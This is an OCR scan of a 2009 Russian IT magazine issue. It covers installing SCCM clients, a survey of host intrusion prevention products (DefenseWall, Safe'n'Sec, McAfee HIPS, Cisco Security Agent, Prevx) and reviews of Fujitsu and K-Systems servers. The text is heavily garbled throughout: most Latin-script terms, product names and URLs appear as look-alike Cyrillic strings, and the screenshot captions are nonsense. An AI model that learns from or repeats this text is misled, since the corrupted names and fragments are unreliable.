сИепІ 8 » предписывает одобрение только 5ССМ-клиентов (клиенты 
старого 5М5 будут отвергнуты) . 

Для удобства управления компьютеры, пользователи и т.п. объединяют- 
ся в коллекции (соПесйоп) по любому признаку (ОС, сеть и т.п.) И именно 
над коллекциями производится большинство действий, вроде установ- 
ки программ и обновлений. После обнаружения клиенты находятся в 
«Сотрійегтапа^етепі: — Соііесгіопз». Здесь — несколько готовых коллек- 
ций (например, по версии ОС). Выбираем «АП Зузгетз» и находим здесь 
наш сервер, на котором установлен 5ССМ. Если список пуст, вызываем из 
меню пункт «Прсіаііе СоПесйоп МетЬегзЫр» и ждем некоторое время. 

В появившейся таблице несколько пунктов . Так, столбик Сііепі; показы- 
вает, установлен ли клиент, а Арргоѵе Д/Аззі^пеД/ВІоскесІ/Асйѵе — его 
состояние. Сам клиент пока не установлен. Это можно сделать: вруч- 
ную (из сетевой папки \\5егѵег\5Пе\СІіепі:\сст5етр.ехе); с помощью 
РшЬ-установки; используя групповые политики АБ или скрипт Ьо§оп, 
предустановленный в образ. Все эти и другие методы в том или ином 
виде уже рассматривались в журнале . Метод «Сііепі; РшЬ Іпзіаіі» — род- 
ное (встроенное) средство распространения клиентов для 5ССМ. 
Доступные на конкретном сайте методы установки можно най- 
ти в пункте « 8 і 1 е зеіііп&з — Сііепі; іпвіаііаііоп теіЬосІ». 
Перед запуском «Сііепі: РивЬ Іпвіаіі» его следует настроить. 
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Выбираем «Сііепі; РизЬ Іпзі:а11аі:іоп5» и вызываем свойства. Что- 
бы производилась автоматическая установка клиентов, устано- 
ви флажок «ЕпаЫе Сііепі; Ривіі Іпзіаііаііопв іч>г а$8І§пе<1 
гезоигсез» и в поле «Зувіет Іуре» отметить типы систем, 
на которые будет установлен клиент — Зегѵегз, ѴѴогкзішіпопз 
и Бошат соптоПегз. Отмечаем флажок «ЕпаЫе Сііепі; РизЬ 
ІпзіаІІаНопз іо іЬе зііе зузіетз», чтобы устанавливать 
клиенты на системы 5ССМ. Во вкладке «Ассоипіз» указываем 
учетную запись пользователя, от имени которой будет произ- 
водиться установка. 

Ручная установка активируется просто. После обнаружения системы 
достаточно выбрать в ее контекстном меню пункт «Іпзіаіі сііепі;» и сле- 
довать указаниям появившегося мастера установки. Мастер содержит 
два шага: один из них информационный, а на втором выбираем пара- 
метры установки (устанавливать ли на контроллер домена, обновлять 
и т.п.) и нажимаем «N 0 x 1 ». Процесс установки клиента начат. 

ЗАКЛЮЧЕНИЕ 5ССМ представляет собой невероятно мощный 
инструмент администрирования корпоративной сети, и возмож- 
ностей у него более чем достаточно. Охватить все настройки и 
подробно описать работу со всеми компонентами в одной статье 
невозможно, да такой задачи и не ставилось. В следующий раз 
рассмотрим порядок установки приложений, обновлений и ОС 
на клиентские компьютеры, а также познакомимся с системой 
отчетов. - ;-!" 



► 125 





» 8ѴІЧ/АСК 



» ЗѴЫ/АСК 



СЕРГЕЙ «ѲРІЫйЕР» ЯРЕМЧУК 

/ бкшоЕкгазѵкАск.ки / 

Новый 

оборонительным 

рубеж 

Обзор популярных систем отражения локальныхугроз 

На своем опыте все успели убедиться в том, что антивирус не обеспечи- 
ваетабсолютной защиты. Пока вирус не попадет в руки специалистов, не 
будет изучен и не появится сгенерированная под него сигнатура, систе- 
ма остается полностью беззащитной перед новыми угрозами. Поднять 
уровеньзащиты хоста на новую высоту позволит применение НІРЗ. 



Основная цель НІР5 (Нозі: Іпігшіоп 

Ргеѵепгіоп Зузіет, система отражения ло- 
кальных угроз) — идентифицировать и бло- 
кировать вредоносные действия в системе и 
не допустить ее заражения. Отслеживаются 
все потенциально опасные операции, такие 
как работа с реестром (в первую очередь 
с ветками, отвечающими за автозапуск), 
файлами и каталогами, запуск/останов про- 
грамм/служб, манипулирование потоками, 
контролируются инжекты в другие процессы 
и целостность системных файлов. Перехват 
АРІ-функций осуществляется по типовым 
методикам, применяемым антивирусными 
мониторами, брандмауэрами, антикейлог- 
герами и антируткитами. При обнаружении 
вызова той или иной функции перехватчик 
передает информацию поведенческому ана- 
лизатору, который принимает решение о 
том, допустим ли данный вызов для выпол- 
няющего его приложения или нет. 

Чтобы подстроиться под конкретную рабо- 
чую среду, в НІР5 есть режим обучения. Он 
создаетпосле установки слепоксистемыи ис- 
пользует его как точку отсчета. Отклонение 
в работе программы или появление нового 
процесса, пытающегося получить доступ к 
важным системным функциям, восприни- 
мается как попытка проникновения, и дейс- 
твие блокируется. Есть и другие алгоритмы, 
например, в Ргеѵх (о нем ниже) используется 
централизованная база, где собраны профи- 



ли как проверенных (назовем их «заведомо 
хороших») программ, так и вредоносных. 
Это позволяет быстро определить характер 
новой программы или процесса на компью- 
тере. 

В виду своей специфики (работа на нижнем 
уровне, перехват АРІ-функций) НІР5 часто 
«не дружат» с антивирусами и антируткита- 
ми. При выборе того или иного решения сле- 
дует учитывать эту особенность. 

Здесь можно возразить: мол, зачем нам еще 
какой-то НІР5, если в том же Каспере уже 
есть модуль «Проактивная защита», реализу- 
ющий нужную функциональность? Все дело 
в том, что движок антивируса изначально 
заточен под традиционный метод защиты, а 
НІР5 идет как вкусная добавка, обладающая 
урезанными возможностями и включенная в 
продукт больше с маркетинговых позиций. 

В настоящее время доступно множество про- 
дуктов, имеющих право называться НІР5. 
Каждый имеет свои особенности и ориенти- 
рован на решение определенных задач. Рас- 
смотрим самые популярные. 

0ЕРЕЫ5ЕѴѴАІ.І. 

Разработчик: 5оН5рЬеге ТесЬпо1о§іе8 
ѴѴеЪ: ѵѵѵѵѵѵ.зоНзрЬеге.сот/гиз 
Системные требования: Іпіеі РепНшп х86 
300 МГц, 256 Мб / (х86/х64) 1 ГГц, 512 Мб 
(для ѴѴіпХР и ѴІ8Іа соответственно) 

ОС: ѴѴіпсіоѵѵ8 ШУ2000/ХР/2003/ѴІ8І:а 



В ПебепзеѴѴаІІ используется принцип разде- 
ления программ/процессов на доверенные и 
недоверенные . Программы из второй группы 
удерживаются в песочнице (ЗапбЬох) , в отде- 
льном от основных программ пространстве. 
В список недоверенных программ автомати- 
чески попадают все приложения для работы 
в интернете — веб-браузер, Р2Р, ІМ-клиенты 
и т.д. Все файлы, загруженные или создан- 
ные такими приложениями, также стано- 
вятся недоверенными. По умолчанию к не- 
доверенным относятся и файлы на съемных 
носителях (для СО/ПѴ!) это активируется 
отдельно). Доверенные программы тоже ог- 
раничены в некоторых правах: они не могут 
модифицировать важные системные файлы, 
ветки реестра, изменять параметры автоза- 
грузки. Благонадежное приложение может 
потерять доверие, стоит ему только выпол- 
нить действие, считающееся потенциально 
опасным. Например, запуск доверенной про- 
граммы из недоверенной автоматически пе- 
реводит действие в опасное. Статус каждой 
программы выводится в верхней части окна. 
В окне настройки есть возможность указать 
файлы и ресурсы (пароли, игровые аккаунты 
и т.п.), которые необходимо защищать с осо- 
бой тщательностью. 

Установку рекомендуется производить в 
«чистой»системе(советотноситсяикосталь- 
ным продуктам этой категории) . Программа 
рассчитана, в первую очередь, на неподго- 



► 126 



ХАКЕР 08 /128/ 09 





товленного пользователя, поэтому имеет упрощенный интерфейс и 
минимум настроек. В большинстве случаев решение принимается 
автоматически. Запрос пользователю выдается лишь при обнару- 
жении кейлоггера, отключении защиты и доступе к защищаемым 
ресурсам, на которые указал пользователь. Это и есть основной плюс 
программы перед конкурентами. ЭеІепзеѴѴаІІ не нужно обучать, от- 
вечая на многочисленные вопросы. Получить полное представление 
о происходящем в системе можно в меню «Список событий». Каждое 
событие содержит следующие поля: Модуль, Время, Путь, Описание 
и Тип события. При выборе элемента списка в нижнем окне появля- 
ется детальная информация по событию. Возможно использование 
фильтров, ускоряющих поиск, и удаление не представляющих инте- 
реса событий. 

Также предусмотрено два экстренныхрежима. При выборе в меню «К 
банкингу/шопингу» (СоВапкіп§/51іорріп§) будут остановлены все 
недоверенные процессы, и запущен браузер в защищенном режиме. 
Кнопка «Стоп атака» останавливает все недоверенные процессы. 
Для продвинутого пользователя существует Ехреп Мобе, в котором 
список недоверенных приложений формируется не программой, а 
самим пользователем. 

Кроме пользовательской, существует версия, созданная специально 
для защиты серверов (АрасЬе, 115 етс) от взлома с использованием 
атак, использующих переполнение стека и кучи, от действия червей 
(СобеКеб, Зіаттег, Заззег, ВІазГег), вирусов и прочих угроз. В сер- 
верной версии используется низкий уровень защиты, и только для 
приложений, указанных админом, устанавливается максимальная 
протекция. 

БАРЕ'Ы'БЕС 

Разработчик: З.ІМ.Ба^е&ЗоНѵѵаге 
ѴѴеЪ: ѵѵѵѵѵѵ.за^епзоН.ги 

Системные требования: Іпіеі Репііит х86 300 МГц, 256 Мб — 
ѴѴіпХР / (х86/х64) 1 ГГц, 512 Мб — ѴІ8іа 
ОС: ѴѴіпбоѵѵз ХР/ѴІ8Іа 

В НІР5 5а1е'п'5ес, разрабатываемой Российской компанией 
З.П.ЗаІе&ЗоіТѵѵаге, используется собственная технология защиты 
Ѵ.І.Р.О. (Ѵаііб Іпзібе Регтіітеб Орегагіопз). Суть программы проста. 
Драйвер ЗаІе'п'Зес загружается на раннем этапе и перехватывает вы- 
зовы системных функций на уровне нулевого кольца ядра ОС. После 
установки клиент сканирует систему, создавая профиль приложе- 
ний и формируя список доверенных программ (для этого использу- 
ется хеш 5 НА-256) . 

При появлении активности, затрагивающей целостность систем- 
ных файлов, реестра, запуск нового процесса или открытие сетевого 
соединения, соответствующая операция блокируется, а пользова- 
тель получает запрос на ее подтверждение. Для описания поведения 
используется универсальный язык правил, определяющий, какие 
действия приложений и пользователей должны блокироваться. 
Плюс задаются дополнительные условия, вроде частоты проявления 
определенного действия. База состоит из системных правил, разра- 
батываемых специалистами, и пользовательских. Последние фор- 



мируются автоматически на основе ответов на запросы. Для работы 
ЗаІе'п'Зес не требуется постоянное обновление баз, хотя периоди- 
чески следует обновлять программные модули. 

Существует два варианта продукта. Для персонального использова- 
ния предназначен 5а1е'п'5ес 2009. В корпоративной версии 5а1е'п'5ес 
Епііегргізе предусмотрено централизованное управление клиент- 
скими модулями. Задействуется два дополнительных компонента: 

• ЗаІе'п'ЗесАбтіпЕхрІогег — консоль управления; используется для 
удаленного администрирования системы; 

• Зегѵісе Сепнег — сервер, непосредственно выдающий команды 
клиентским модулям; он же производит их централизованное об- 
новление, отвечает за создание отчетов и оповещение администра- 
тора о возникновении определенных событий. 

Кроме обычной, существует версия клиентской программы, в кото- 
рую включен антивирусный модуль Эг.ѴѴеЪ и версия с модулем защи- 
ты от программ-шпионов. В этом случае обеспечивается не только 
блокировка атак, но и лечение зараженных файлов. Корпоративная 
версия, помимо перечисленных возможностей, имеет и ряд других 
востребованных функций, например, контроль подключений и мо- 
ниторинг ІІ5В-устройств. 

Если в системе уже есть антивирус, перед установкой 5а1е'п'5ес сле- 
дует просмотреть таблицу совместимости с другими продуктами, 
которая приведена на сайте. Например, напротив Казрегзку Апгі- 
Ѵігш 2009 отмечено «не совместим». 

МСАРЕЕ Н0БТ ІЫТЕНІБІОЫ РКЕѴЕЫТІ0Ы 
РОК 0Е5КТ0Р5 А№ БЕКѴЕКБ 

Разработчик: Ие 1 :ѵѵт>гкА 880 сіа 1 :е 8 
ѴѴеЪ: ѵѵшѵѵ.тса^ее.сот, ѵѵѵѵѵѵ.тса^еезесигііу.ги 
Системные требования: минимальные системные 
ОС десктоп: ѴѴіпбоѵѵз ХР/ѴІ8І:а 

ОС сервер: ѴѴіпбоѵѵз 2000/2003/2008 (х86/х64), КНЕ Ілпих 4.0 
(х86), 5о1агІ8 8/9/10 

В НІР5 от МсАІее объединены возможности продуктов Эезкиор 
Еігеѵѵаіі и НІР5 Епіегсері (до 2003 года разрабатывался одноименной 
компанией, которая была выкуплена Ыеі:ѵ\гогк Аззосіагез). Доступен 
как самостоятельное решение и как часть комплексного продукта 
Тоіаі Ргоіесгіоп іог Епброіпі:. Поведенческий анализатор отслежива- 
ет и блокирует нежелательную активность, используя три уровня за- 
щиты: поведенческий анализ, сигнатурный и контроль соединений 
брандмауэром. В результате обеспечивается защита от известных 
и еще неизвестных атак, направленных на переполнение буфера, а 
также защита приложений, — в том числе от попыток обмена данны- 
ми с другими приложениями. Из дополнительных функций отметим 
возможность контроля приложений (можно определить список раз- 
решенных и запрещенных) и блокировку ИЗВ-носителей. 
Брандмауэр контролирует исходящий трафик и блокирует несанк- 
ционированные внешние подключения. Для мобильных систем 
можно устанавливать различные уровни безопасности, в зависимос- 
ти от того, находятся они в защищенной или незащищенной сети, 
подключены ли через ѴР]Ч. Предусмотрен карантин для тех систем. 
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Ч? ОеГегш?У/аН - 5 *гопе Ргоіесйоп А^яіпкі Лс^агс^руи'агс/КеуЕо&есг^ШооМІі 



Стоп агакаі | Недомеренные приложения | [ Лог событий ] [ Дополнительно | 



Модуль 


Путь 


Описание 


л. 
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и) тшиіеке 


С:ѴРіодгаГті РІехѴОиІІоо... 


Операцнотая систем. 




О 'Л'гпрЩгѵС 


С:\Ріод<ат РдеіЧѴЛпгіо. . . 


Операцно»*ая систем 
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МіяогаІкѴЛгіФѵв Ме<1 




ф Игеіок ене 
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Операционная систем. 
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Операциоиия систем. 
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Ъй Предупреждение 5вТе‘п*5ес 
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Приложение пытается изменить системные файлы 
ММот 



&вТе'п'5вс обперужмп приложение, которое п «иг естся миеиитъ сметенные феЯлы Ѵ/іпйож». 
Несеииииоммроеанное изменение системныя файлов может нарушите работоспособность 
УѴіпгіож*, 

Приложение: М5ІЕХЕС.ЕХЕ 

Ние феАла: С:\МШ(>ОМ$\Мт$Х$\ХВ6 МІСАО5ОРІ.ѴСВ0.АТІ. 1ЕС8ВЗВ9АІЕ18ЕЗВ 
В.0.$0727.7«2_ХМГѴѴ_СВВ27474\Аив0.Ои 



системный файлы «тропе яле тоі 
.. Одмаяо, 

установки про гранимого 
Если приложение не является 
неизвестно это приложение, то 



Совет: некоторые вредоносные программы 
чтобы скрыть свое присутствие е системе илі 
программа обновления ЛіпОом* или некоторые 
обеспечения так же могут изменять сметенные «. 
программой установки ПО или обновления и и Вам 
рекомендуем Вам Заблокировать любую 



Разрешит» И актмамост* л 
:^| Гма неполное ат» параметры текущего событие при свидании праамла). | Разрешить 

Запретит» КЗ актиеиост» прилоа 



КОНСОЛЬ БАРЕ'ІМ'БЕСАОМІЫ ЕХРЮКЕК 
ДОСТАТОЧНО ПРОСТА В ИСПОЛЬЗОВАНИИ 



ПРЕДУПРЕЖДЕНИЕ БАРЕ' Ы'БЕС О ПОПЫТКЕ ИЗМЕНЕНИЯ 
СИСТЕМНЫХ ФАЙЛОВ 




> іпіо 

• Основная цель 



НІР5 — по заданным 
критериям иденти- 
фицировать и блоки- 
ровать вредоносные 
действия в системе 
и не допустить ее 
заражения. 

• Поведенческий 
анализатор решения 
от МсАіее использует 
три уровня защиты: 
поведенческий 
анализ, сигнатурный 
и контроль соедине- 
ний брандмауэром. 

• Ргеѵх все данные 

о программах хранит 
централизованно. 

• Тесты, которые ты 
без труда найдешь 
в интернете, пока- 
зывают преимущес- 
тво НІР5 во всех 
реализациях над 
привычными анти- 
вирусами с включен- 
ными проактивными 
модул ял и. 



которые не выполняют всех требований безопасности. 
Управление упрощается за счет присутствия стандарт- 
ных настроек (политик), обеспечивающих защиту пос- 
ле установки. При этом изначально ІР5 активирован на 
высоком уровне, приложения и процессы защищены, 



сізсо бесукітѵ 

АбЕІМТ(СБА) 

Корпорация Сізсо, выкупив в 2003 году компанию 
Окепа, которая разрабатывала НІР5 под названием 
ЗюгтѴѴаГсЬ. А^егщ через некоторое время представила 
решение на его основе. С5А может быть установлен 
на десктопе или сервере, работающем под управле- 
нием ѴѴіпсіоѵѵб от 2кдоѴІ5Га, КНЕЬЗ. 0/4.0, Зоіагіз 8/9 
и ѴМѵѵаге. Агент после установки составляет снимок 
работающей системы. Затем, перехватывая все 
системные вызовы, связанные с работой с файлами, 
доступом к сети и реестру, динамически используемым 
ресурсам (страницы памяти, общие модули библиотек 
и СОМ-объекты), определяет, насколько они отклоне- 
ны от нормы. Сверяясь с политиками безопасности, 
агент разрешает или запрещает действие и вносит при 
необходимости запись в журнал. Политики безопаснос- 
ти по умолчанию способны остановить большинство 
известных и неизвестных угроз. Администратор может 
их корректировать. Например, можно установить 
правила использования подключаемых устройств 
(флешек, фотоаппаратов, СЭ /ЭѴБ), запретить скачи- 
вать файлы определенного типа и т.д. 
Централизованное управление осуществляется при по- 
мощи Сізсо Мапа^етегц Сепгег Гог Сізсо Зесигііу А^епщ. 
Кроме этого, С5А интегрируется с другими продук- 
тами Сізсо — сетевыми ІР5, межсетевыми экранами, 
устройствами контроля доступа к сети (ПАС) , системой 
управления безопасностью Сізсо МАК5. Продукт обла- 
дает широкими возможностями, но достаточно сложен 
в освоении. 



приложения от МсАГее находятся в списке доверенных. В 
процессе работы вполне естественно, что изначальных 
настроек будет недостаточно. Поэтому НІР5 подстраи- 
вается, работая в адаптивном (самостоятельно) или обу- 
чаемом режиме (по подсказкам пользователя). Версия 
Зегѵег, кроме указанных выше функций, обеспечивает 
защиту веб-серверов (АрасЬе 1.3.х/2.х, 5ип (ЖЕ/Іаѵа 
ѴѴеЪ Зегѵег) и серверов баз данных (ЗС^Ь Зегѵег 2000) 
от некоторых типов атак (Эігесгогу ггаѵегзаі, ЭоЗ, ЗС^Ь 
ігуесНопидр.). 

Эта НІР5 может работать только совместно с системой 
централизованного управления политиками, сбора 
данных, установки обновлений — еРоІісу ОгсЬезГгаШг 
(ее можно использовать для управления остальными 
продуктами МсАГее). На клиентской системе устанав- 
ливается агент, обеспечивающий связь НІР5 с сервером 
еРО. 

На сегодня доступны две версии еРО: в 3.6.1 консоль ре- 
ализована в виде ММС, а в 4.0.0 — в виде веб-сервиса. 
Использование во втором варианте протокола НТТР/ 
НТТР5 позволяет управлять настройками с любой плат- 
формы. 

Для установки еРО-сервера понадобится компьютер 
под управлением ѴѴіп2к 5Р4/2003 5Р1/5Р2/К2, консоль 
\Ѵіп2к/ХР/2003/Ѵізі:а. В качестве ЗС^Ь-сервера для не- 
больших организаций рекомендован ЗС^Ь Зегѵег 2005 
Ехргезз ЕбШоп; поддерживается 5(2 Ь Зегѵег 2000/2005. 

РКЕѴХЗ.О 

Разработчик: Ргеѵх Ілтііесі 
\ѴеЪ: ргеѵх. сот 

Системные требования: минимальные системные 
ОС: ѴѴіпсІоѵѵз 98/ИТ/2000/ХР/2003/Ѵіз1;а/2008/ 
5е7еп 

Система Ргеѵх появилась в начале 2004 года и была пред- 
ставлена как первая Соттипіііу ІРЗ, предназначенная 
для защиты отдельных узлов. Термин Сіоиб сотриі:іп§ 
в то время еще не использовался, но все признаки пре- 
доставления ПО как услуги (зоітѵѵаге-аз-зегѵісе, ЗААЗ) 
и удаленные хранилища данных в Ргеѵх уже имелись. 
В Ргеѵх для определения угроз используются правила, 
описывающие поведение и контрольные суммы про- 
грамм. В список рулесетов попадают как заведомо хо- 
рошие программы, так и плохие. Это позволяет быстро 
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1)сІспхс«лІІ - Ягопц Ргоіесіюп Адоіпхі Асіжагс/Ъруѵпііс/Ксуіовдсгг/Нооікііх 



Стоп ага» аі Надоег рсс»» прияоадаааі Пег соСъпий Допол»*»теііыо 

Оа*апи№аІ мшмимт от ікбых юаестиьл шѵ нвиэввеом фуѵшв/а4ж«гв. разавляя ас* приложения 
домрси»»» м иеаос ср е нжл е Прваокраняет от иеаомдо**** приложений и моамвтвций. способных 
нарушить целостность вашей системы Запускайте обновление программ как девере м м с* 

Ести поместить браузер, е-таі. ІМ- и Р2Р к<ыеиты а ншооеромуо зону, то «обой загруженный ебнете и 
(рунете будет неспособен заразить вашу систему из-за ограименый. нал ож е н к и ОЫепм^аі 
Есты увидите атаку вашей системы неасверемым приложением, то просто закройте все неасвереные 
приложения Любой іруѵнате или абнате автоматически будет блокирован 



Файлы и кяо«*т реестра 




Стоп аптека* 



I от I I о™— I 



ЕРО: КОНСОЛЬ УПРАВЛЕНИЯ ПРОДУКТАМИ 
МСАРЕЕ 




ПОСЛ Е УСТАНОВКИ РРЕѴХ ПРОСКАНИРУЕТ СИСТЕМУ 



определить характер новой программы или процесса на 
компьютере. Вся информация хранится в единой базе 
данных (Ргеѵх Сіоисі Соттипііу БашЪазе). В качестве 
сенсоров этой гигантской ІР5 выступают агенты, уста- 
новленные на клиентских машинах. 

Дистрибутив программы очень маленький, — всего 768 
Кб. После установки агент сканирует систему на предмет 
установленных приложений и отправляет запрос на цен- 
тральный сервер, а на основании полученной информа- 
ции делает вывод. Все происходит довольно быстро. Так, 
первое и полное сканирования занимают всего 2-4 мину- 
ты. Последующие обычно и того быстрее, менее минуты. 
Если в центральной базе данных нет сведений о програм- 
ме, то она помечается как неизвестная, модуль заносит 
ее в базу, а пользователь предупреждается о возможном 
риске. Профиль любой программы содержит более сотни 
параметров. И в большинстве случаев сервер способен 
определить ее характер самостоятельно, основываясь на 
поведенческих характеристиках. Уже через 4 года сущес- 
твования база знала о 10 миллиардах событий, что прак- 
тически сводит на нет вероятность ошибки. Ежедневно в 
базу заносятся до 250 тысяч событий. 

В ходе работы агент использует три слоя защиты: эврис- 
тический (оценивает поведение), возрастной (время 
появления) и известность программы. В случае обнару- 
жения вредоносной программы возможна очистка сис- 
темы. Ргеѵх выдаст подробные инструкции, например, 
запросит установочный диск ѴѴіпсІоѵѵз; предусмотрен 
также вариант автоматической закачки целого систем- 
ного файла с другого компьютера сообщества. 

Кроме варианта Ноте, ориентированного на персо- 
нальное использование, имеются Вшіпезз и Етегргізе 
версии, в которых реализовано централизованное уп- 
равление агентскими модулями. Для организаций пред- 
лагается Егее Маіѵѵаге Моппог, распространяющийся 
бесплатно, но агент, входящий в его состав, имеет лишь 
функции обнаружения. Бороться с обнаруженными не- 
приятностями придется при помощи других утилит, или 
купив полную версию. 

Ргеѵх может использоваться как автономно, так и быть 
усилена другими продуктами: межсетевым экраном, 
антивирусом, антишпионами и пр. Обычно проблем с 
совместимостью не бывает. Хотя этот продукт имеет 
единственный, но существенный минус — он привязан 
к серверу и без него фактически беспомощен. 




НАСТРОЙКИ РРЕѴХ ПОЗВОЛЯЮТ УСТАНОВИТЬ ЧУ ветви- 
ТЕЛЬНОСТЬ ЗАЩИТЫ ПОТРЕМ ПАРАМЕТРАМ: ЭВРИСТИКА, 
ПОПУЛЯРНОСТЬ И ВОЗРАСТ 



3 АКЛ ЮЧ Е Н И Е Еще каких-нибудь парулет назад о системах 
отражения локальных угроз практически ничего не было 
слышно, но сейчас можно утверждать, что произошел про- 
рыв. Существующие варианты НІР5 довольно разнообраз- 
ны. Каждое решение имеет свои особенности и тщательно 
скрываемые разработчиками алгоритмы, ц-ц 



С КЕМ ДРУЖИТЬ 
БУДЕМ? 

С одной стороны, чтобы достичь наибольшей эффек- 
тивности защиты, НІР5 следует использовать вместе с 
антивирусом и брандмауэром, тогда приложения будут 
дополнять друг друга, и ты будешь хорошо защищен как 
от внутренних, так и от внешних атак. С другой — НІР5 
часто «не дружат» с антивирусами и антируткитами. 
При выборе того или иного решения следует учитывать 
эту особенность. 




> СІѴСІ 

В видеоролике кэтой 
статье мы познако- 
мимся с основ- 
ными возможнос- 
тями 5а1е' п ’5ес, 
Ое^епзеѴѴаІІ и Ргеѵх. 
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ЫАТНАЫ ВІЫКЕРТ 

/ ЫАтгазѵмАск.ки / 

Японский 





РВІМЕК6УКХ200 55 : 



111-сервер пятого поколения от Ріціізй 




Технические характеристики 
Рщіібіі РШМЕК6Ѵ КХ200 55 

> Тип материнской платы: 

Э 2786 (чипсет I пііеі 5500] 

> Процессор: 

1 или 2 процессора ІпГеІХеоп серии 55хх 

> Память: 

От 1 до 96 Гб ОІММ ООРЗ 1 066/1 333 МГц (12 
разъемов] 

Поддержка ЕС С , 5ЭСС, Метогу 5сгиЬЬіпд, 
зеркалирования 

> Жесткие диски: 

8 2,5-дюймовых жестких дисков 5А5 

> Поддержка ВАШ: 

Интегрированный РАІЭ-контроллер 0/1 



> Сетевой интерфейс: 

2 порта ЕГбегпеІ: 1 Гбит/с 

1 порт сервисной ЛВС для і ВМС 52 (1 0/1 00 

Мбит/с] 

> Питание: 

Блок питания с возможностью «горячей 
замены» в стандартной конфигурации, 
дублирование блока питания — какопция 
(дублирование 1 + 1 ] 

> Расширение: 

1 разъем РСІ-Ехргезз х4 (низкопрофильный] 

2 разъема РСІ-Ехргезз х8 (1 полновысотный 
или низкопрофильный, 1 низкопрофильный] 

> Внешние порты ввода-вывода: 

7 портов С5В 2.0 (3 на передней панели, 3 на 
задней панели, 1 внутренний] 

2 разъема ѴСА (1 на передней панели] 

1 порт Р5-232-С (9-штырьковый] 



> Функции управления: 

Сервисная панель ЗегѵегѴіеѵѵ Еосаі Зегѵісе 
РапеКЕЗР] 

Интегрированный контроллер удаленного 
управления (і ВМС 52, включая 32 Мб памяти 
и графический контроллер], совместимый с 
ІРМІ2.0 

> Система охлаждения: 

Технология Сооі-заіе 
6 двойных вентиляторов с возможностью 
«горячей замены» и дублированием (5+1 ] 

> Исполнение: 

Установка в стойку (ІИ, 431x765x43 мм] 

> Гарантийное обслуживание: 

Срок гарантии — 3 года 
Обслуживание на месте установки 



Сегодня в наш обзор попал новейший сервер 
среднего уровня КХ200 55 от компании Рищзи, 
способный показать гигантам в лице НР и ІВМ, 
что высокотехнологичные и эффективные сто- 
ечные серверы умеют делать не только они. 

В качестве начинки сервер может быть осна- 
щен одним или двумя двух/четырехъядер- 
ными процессорами Іптеі Хеоп серии 55хх, 
восемью дисками 5А5, до 96 Гб памяти ББКЗ. 
Интегрированный контроллер НАГО 0/1 мо- 
жет быть дополнен РСІ-Х контроллером КАШ 
0,1,10,5,50,6,60. Предусмотрена возмож- 
ность «горячего» резервирования и зерка- 
лирования памяти. Это позволяет серверу не 
останавливаться в случае сбоя одного из мо- 
дулей памяти и своевременно оповещать сис- 



темного администратора о неисправности. 
Из примечательных особенностей стоит отме- 
тить возможность установки привода Віие-Кау 
и технологию охлаждения Сооі-заіе. Привод 
станет отличной альтернативой системам бэка- 
па на магнитной ленте, а технология Сооі-заіе, в 
основе которой лежит методика Сотриіаііопаі 
Ріиісі Бупатісз, используемая при проектиро- 
вании летательных аппаратов, обеспечивает 
наиболее эффективный путь прохождения 
воздуха через корпус и допускает применение 
малого количества вентиляторов, работающих 
на пониженных скоростях. 

Сервер получился исключительно экономич- 
ным. Блоки питания, КПД которых достигает 
89%, гибкая система настройки энергопотреб- 



ления и использование медных проводников 
с пониженным сопротивлением для всех шин 
питания позволили серверу потреблять замет- 
но меньшее количество энергии и удостоиться 
«двух звезд» Сгееп ІТ. 

Сервер оснащен совместимым с ІРМІ 2.0 конт- 
роллеромудаленногоуправленияиспециально 
выделенным для него портом ЛВС. Это позволя- 
ет управлять машиной даже после сбоя в сети. 

В список официально поддерживаемых опе- 
рационных систем входят МісгозоЕ ѴѴіпсІоѵѵз 
Зегѵег 2003/2008, Поѵеіі 51І5Е Ілпих Епіегргізе 
Зегѵег, Кеб Наг Епіегргізе Ілпих, ѴМѵѵаге 
ІпітазігисШге . Поддержка других модификаций 
Ілпих осуществляется по запросу. 

Цена: от 60000 рублей. 
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Выбор патл 




Универсальный сервер: 
К-51уІе МагзЬаЦ ЫР 2010 





Технические характеристики 
Р-51уІе Магзііаіі ЫР 201 о 

> Процессор: 

До двух 2/4-х ядерных процессоров Іпіеі 
Хеоп Ргосеззог серии 50хх, 51 хх или 53хх 
Частота шины 667 МГц, 1 067 МГц или 1 333 
МГц 

> Чипсет: 

I пГеІ 5000Ѵ 



> Память: 

До 16 Гб памяти ББК2-533 или ББР2-667 
ЕСС (8 слотов] 

> Жесткие диски: 

До двух ШЕ-устройств на одном канале 

6 портов 5АТА 
4 порта 5А5 

Опционально — корзина «горячей замены» 

> Поддержка РАШ: 

РАЮ 0,1,10,5 

> Сетевой интерфейс: 

2 порта Іпіеі ѲідабіІ ЕДіегпеІ 

> Питание: 

Один блок питания 550 Ватт 
До двух блоков питания 650 Ватт 

> Расширение: 

2 разъема РСІ Ехргеззх4 
2 разъема РСІ-Х 64-60/1 33 МГц 

1 разъем РСІ 32-60/33 МГц 

> Внешние порты ввода-вывода: 

7 портов 05В 2.0 (4 сзади, 2 спереди, 1 внут- 
ренний, для подключения опционального 
05В ЕОБ) 

2 порта Р5-232-С 



2 разъема БВ-9 (9 ріп, асинхронные] 

2 порта Р5/2 

> Система охлаждения: 

Блок питания: один вентилятор 80 мм 
Системные компоненты: один вентилятор 
1 20 мм 

При установке 5А5/5АТА корзины с под- 
держкой «горячей замены» НББ: один 
вентилятор 92 мм 

> Другое: 

Видеоконтроллер АТІ Е51 000 (16 Мб 5БВАМ] 
ПриводСО, ВѴВ/СОРѴѴ или БѴБ±РѴѴ 

> Исполнение: 

Напольный (452x235x483] или для установки 
в стойку (611, 235x447x483] 

> Гарантийное обслуживание: 

Срок гарантии — 3 года 



МагзЬаІІ ЫР 2010 — сервер начального уровня 
от одного из старейших российских произво- 
дителей компьютерной техники — компании 
К-5і:у1е СотріЛегз. Машина поставляется в 
универсальном корпусе, благодаря которому 
может выполнять функции одиночного сер- 
вера (или может быть установлена в стойку) . 
Обладает более чем хорошими характеристи- 
ками производительности и отлично подхо- 
дит для компаний, ограниченных в бюджете 
сегодня, но ожидающих бурный рост завтра. 
Сервер может быть оснащен одним или дву- 
мя процессорами линейки Іпгеі Хеоп 5000, 
памятью БОК2-66 7 ЕСС, общим объемом 
до 16 Гб, шестью жесткими дисками 3.5" и 
опциональной корзиной «горячей замены» 



на шесть 5А5/5АТА-дисков. В минималь- 
ной конфигурации он хорошо подходит для 
выполнения задач по поддержке сетевой 
инфраструктуры, а при небольшой модер- 
низации становится производительным 
ѵѵеЪ-сервером или даже узлом распределен- 
ной вычислительной сети (чему способству- 
ет возможность установки в стойку) . 

В корпус устанавливается один блок пи- 
